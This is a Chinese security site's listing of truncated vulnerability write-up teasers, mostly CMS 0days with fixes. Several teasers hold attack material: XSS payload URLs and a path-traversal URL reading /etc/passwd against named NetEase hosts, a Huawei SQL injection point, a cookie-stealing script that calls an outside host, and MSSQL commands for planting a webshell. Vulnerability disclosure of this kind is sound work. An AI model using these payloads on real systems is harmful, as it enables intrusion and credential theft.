米号文章管理系统0day及修复(影响版本) - 网站安关注热度:15

Blog:blog.moonhack.com!--#include file=include/head.asp--!--#include file=include/ubb2html.asp--%Dim ContextID,Form_Title,Form_Context,formID,i2,title,Page,Pages,AllCount,ShowCount,Pas.....[详情]

网易公益爆路径和xss及修复方案 - 网站安全 - 自关注热度:22

简要描述： 爆路径和几个跨站详细说明：http://bjjnds.163.com//spdgzsy.phphttp://bjjnds.163.com/2ji.php?page_style=%27%20onmouseover%3dprompt%28302667234%29%20bad%3d%27漏洞证明： 修复方案： 过滤..[详情]

客户端进程(非服务端)设置cookie的几种思路 - 网站关注热度:22

一般要操作COOKIE有三种方式:1.客户端浏览器按照协议规定接受服务端的set-cookie头操作cookie。2.客户端浏览器通过DOM接口操作cookie。3.直接在客户端构造好浏览器接受的cookie文件。下面就说..[详情]

優吉兒網站管理系统ODAY及修复 - 网站安全 - 自学关注热度:38

# # Title: 優吉兒網站管理系统 ODAY# Team:makebugs# Author: 黑小子测试代码：admin/ugA_UploadImg.asp?hidfrmN=frmUGhidtxtN=txtImgPath02hidImgP=ImgSynLifehidFileName=hidReName=YhidReturn=Y.....[详情]

oecms多处漏洞及修补方法 - 网站安全 - 自学php关注热度:47

任意文件下载漏洞文件：downurl.php漏洞代码：?php$url = isset($_GET[#39;url#39;]) ? trim($_GET[#39;url#39;]) : ;header(Content-Type: application/force-download);header(Content-Dispo.....[详情]

深山网站管理系统漏洞及修复 - 网站安全 - 自学关注热度:15

MakeBug Micropoor@163.com#39;\line.aspdim idsdidsd=trim(request(id))if idsd= or idsd=0 or not isnumeric(idsd) thenrs.open select * from qwbm_line where shenhe=1 and id= i.....[详情]

littlephpcms 多处注入 上传 信息泄漏等漏洞及修复关注热度:18

简要描述：// pageArt.php //..略 $column = $_POST[column]; $rownum = $_POST[rownum]; $sql = select id,title,addtime from lpc_article where column_id=.$column; //..略 其他类.....[详情]

风渡科技ASP网上购物v11.919漏洞及修复 - 网站安全关注热度:14

MakeBug Micropoor@163.com#39;conn.asp%On Error Resume Nextservermappath=server.mappath(/serverinfo.asa)#39;略DBstr=txt.ReadLine #39;数据库地址名称#39;略%读取serverinfo.asa#39;s.....[详情]

星外订单提交处过滤不严导致XSS及修复 - 网站安关注热度:15

google or baidu 搜索 inurl:user/order.asp?type=虚拟主机暂时只会XSS偷取cookie可以加帐号 可以后台挂马 等等等等XXS 偷取cookie代码scriptdocument.write(#39;img src=http://www.2cto.com /ne.....[详情]

phpcms V9 存储XSS及修复方案 - 网站安全 - 自学php关注热度:33

简要描述： 晴天小铸菜虫学习 tenzy 大牛挖oday详细说明：本人用http://www.grandcloud.cn/ 盛大的站实践~th width=120公司网址：/th tdscriptalert(/xss/)/script/td /tr tr t.....[详情]

Understanding MD5 Length Extension Attack - 网站安全 - 自学关注热度:58

背景 在2009年，Thai Duong 与Juliano Rizzo 不仅仅发布了ASP.NET的padding oracle攻击，同时还写了一篇关于Flickr API签名可伪造的paper，和padding oracle的paper放在一起。因为Flickr API签名的这个.....[详情]

宏飞企业网站管理系统V1.1 漏洞及修复 - 网站安全关注热度:21

is87_sql.asp% Dim GetFlag Rem(提交方式) Dim ErrorSql Rem(非法字符) #39;..略 ErrorSql = #39;~;~and~(~)~exec~update~count~*~%~chr~mid~master~truncate~char~declare Rem(每个敏感字符或者.....[详情]

注意3个MSSQL扩展,可被用来获取WEBSHELL - 网站安全关注热度:20

EXEC [master].[dbo].[xp_makecab] lsquo;c:\test.rarrsquo;,#39;defaultrsquo;,1,rsquo;d:\cmd.asprsquo;打包EXEC [master].[dbo].[xp_unpackcab] lsquo;C:\test.rarrsquo;,#39;c:rsquo;,1, ls.....[详情]

Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting缺陷及关注热度:18

Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability开发者: Toko产品主页: http://toko-contenteditor.pageil.net受影响版本: 1.5.2Summary: Toko Web Content Editor cms .....[详情]

破解智睿企业网站注册版本提示的方法 - 网站安关注热度:33

最近用到了智睿企业网站的模板，（此模板是挂到各大网站下载，而且标明了是免费使用，免费软件）感觉这个框架架构比较清晰简单，最主要的还是3语版，有中文，繁体，英文，因此..[详情]

解读cookie和session的混乱概念 - 网站安全 - 自学关注热度:41

前几日，因为一些Web的基础概念和职业欠钱兄弟讨论了很久，其中对于session的问题讨论最久，因为各自对session名词和概念的理解不同有了一些小争议，我们俩都知道是什么东西，可就是..[详情]

某系统cookies批量注入漏洞及修复 - 网站安全 - 自关注热度:40

by Mr.DzY from www.0855.tv由于真搞不明白是哪个是原作者，只好用个某字来代替。你抄抄，我抄抄，大家一起抄。大家一起来做网站建设。下面分别是两个建站公司的源码，一模一样的。泥玛..[详情]

有/无cmd命令行下添加用户的方法:API添加用户与关注热度:24

今天研究了一下用户控制面板文件nusrmgr.cpl，发现调用的是Shell.Users来加用户，它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话，这一个 Shell.User..[详情]

网易某分站目录遍历及修复 - 网站安全 - 自学p关注热度:15

简要描述：目录遍历，可读到/etc/passwd文件，开启telnet详细说明：漏洞证明：http://220.181.99.60:80/mobile/register.jsp?step=../../../../../../../../../../etc/passwd%00.png..[详情]

Nginx简单防御CC攻击 - 网站安全 - 自学php关注热度:16

Nginx是一款轻量级的Web服务器，由俄罗斯的程序设计师Igor Sysoev所开发，最初供俄国大型的入口网站及搜寻引Rambler使用。 其特点是占有内存少，并发能力强，事实上Nginx的并发能力确实在..[详情]

Web服务器捉虫速记 - 网站安全 - 自学php关注热度:24

Web服务器捉虫速记一服务器疑似被挂马，现象是从百度搜该站点，出来的结果大部分为色情网站。马上登录服务器（半夜好困啊）。执行如下的步骤：!--[if !supportLists]--1、!--[endif]--检查..[详情]

PHPKode Guestbook 1.0 Session劫持缺陷及修复 - 网站安全关注热度:26

PHPKode Guestbook 1.0 Session Hijacking Vulnerability---------------------------------------------------------作者: bd0rk联系方式： bd0rk[at]hackermail.com www.2cto.comGreetz: Perle, Zub.....[详情]

A2CMS源码泄露缺陷及修复 - 网站安全 - 自学php关注热度:37

作者 : St493r联系方式: St493r@gmail.com标题: A2CMS Source Code Disclosure Vulnerability开发者 : http://a2cms.com www.2cto.com缺陷文件 : /js/index.php测试方式: /js/index.php?f=filenam.....[详情]

天涯的一个鸡肋XSS - 网站安全 - 自学php关注热度:27

简要描述：一个很鸡肋的XSS脚本执行漏洞 刚刚在天涯发帖被一SB版主删帖后发现的 鸡肋但是好用 没深入分析 不过用来盗版主SB二代号还是可以的详细说明：这个只有在版主删你帖子之后..[详情]

冠龙科技企业网站管理系统 2011 sql注入漏洞及修关注热度:31

by Mr.DzY from www.0855.tv源码简介:冠龙科技企业网站管理系统是基于ASP+ACCESS技术开发的电子商务平台,属于全自动化、全智能的在线方式管理、维护、更新的网站管理系统。此系统直接上传到..[详情]

天涯高权限用户过滤不严导致漏洞及解决方法关注热度:13

话说昨天一不小心就发现了个天涯的xss漏洞，下面说下是如何发现的，此文可以延伸到所有高权限用户过滤不严的论坛。首先，我用特殊的方法搞到了一个版主的号，然后想看看wooyun说..[详情]

星外asp.net安全模式的突破方法（鸡肋） - 网站安关注热度:44

作者：康斯坦丁本文意思是。在条件许可的情况下，重写web.config 获取权限我的这篇 关于执行aspx大马时出现的错误信息原理的介绍 发表后引来了不少同学的讨论，之后backerhack同学发表..[详情]

再谈QQ史上最大的“后门” - 网站安全 - 自学ph关注热度:39

为什么是再谈，因为这个安全漏洞已存在多年，且变成讳疾忌医的历史安全问题了，到底有多少人会因此受害，不得而知，堪称QQ的这个史上最大的后门。我们先来科普腾讯单点登陆的某..[详情]

WordPress插件editormonkey-FCKe多个上传文件缺陷及修复关注热度:58

标题: WordPress Plugins (editormonkey-FCKe) Multiple File Upload Vulnerabilities作者 : KedAns-Dz平台: php影响 : File Upload测试：if test.php =creating .htaccess file :FilesMatc.....[详情]

华为智慧云存在SQL注入及修补方案 - 网站安全关注热度:19

作者： Matrix简要描述：华为智慧云存在SQL注入，理论上可修改后台数据详细说明：http://developer.huaweidevice.com/dev_creg.php用户名验证POST数据不严格，提交地址 /dev_creg/preg.php?ckuser=1参考如下..[详情]